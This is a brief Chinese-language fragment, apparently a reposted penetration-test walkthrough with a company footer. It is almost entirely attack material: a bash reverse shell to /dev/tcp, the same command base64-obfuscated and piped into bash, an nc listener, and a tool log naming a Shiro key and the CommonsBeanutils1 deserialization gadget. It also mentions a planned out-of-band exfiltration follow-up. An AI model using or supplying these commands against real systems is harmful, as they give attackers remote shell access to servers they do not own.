|
2019-05-17
bash -i >& /dev/tcp/XXX.XXX.XXX.XXX/9999 0>&1
使用bash加密为
bash -c {echo,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=}|{base64,-d}|{bash,-i}
nc -lvvp 9999 //端口进行监听
[*] Using Key kPH+bIxk5D2deZiIxcaaaA== [*] Using Gadget CommonsBeanutils1
经过确认,这个实战目标Shell是通过反弹回不来的,需要通过带外攻击OOB截取返回包获取shell,下篇分享OOB
编辑:航网科技 来源:腾讯云 本文版权归原作者所有 转载请注明出处
微信扫一扫咨询客服
全国免费服务热线
0755-36300002